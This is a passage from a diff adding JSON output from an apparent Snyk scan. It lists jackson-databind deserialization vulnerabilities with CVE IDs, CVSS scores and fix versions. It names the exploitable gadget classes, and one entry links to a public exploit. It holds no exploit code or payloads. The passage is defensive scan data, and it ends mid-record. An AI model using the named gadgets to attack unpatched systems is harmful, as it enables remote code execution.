"2019-07-29T14:55:33.030000Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.502907Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.7.9.6" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": 
false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2449", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.808389Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", + "epssDetails": { + "percentile": "0.71702", + "probability": "0.00342", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16335" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-85cw-hj65-qqv9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:06.837179Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:30:24Z", 
+ "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:30:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.931793Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "iSafeBlue" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + 
"url": "https://github.com/FasterXML/jackson-databind/issues/2410", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.892322Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", + "epssDetails": { + "percentile": "0.74104", + "probability": "0.00410", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14540" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h822-r4r5-v8jg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:10.401907Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:27:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + 
"artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:27:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.008832Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2420", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-06T13:58:32.899468Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T14:43:42.115110Z", + "functions_new": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + 
"functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-16T14:37:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T14:37:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:32.899468Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": 
"https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:50.462784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. 
An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16942" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx7p-6679-8g3q" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:02:18.178548Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": 
"CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.988000Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": 
"2024-03-11T09:52:13.709990Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.814203Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A 